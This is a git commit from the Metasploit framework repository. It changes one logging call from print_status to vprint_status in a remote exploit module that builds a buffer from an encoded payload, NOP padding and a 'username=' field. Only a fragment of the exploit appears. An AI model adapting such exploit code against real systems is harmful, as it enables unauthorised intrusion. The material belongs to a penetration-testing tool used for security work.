Minor tweak to use vprint...

MS-2855/keylogger-mettle-extension
Pearce Barry 2017-12-11 16:48:47 -06:00
parent e91830efe7
commit 9a6c54840b
No known key found for this signature in database
GPG Key ID: 0916F4DEA5C5DE0A
1 changed files with 1 additions and 1 deletions

View File

@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
evil << payload.encoded
evil << make_nops(10000 - evil.length)
print_status("Evil length: " + evil.length.to_s)
vprint_status("Evil length: " + evil.length.to_s)
sploit = "username="
sploit << evil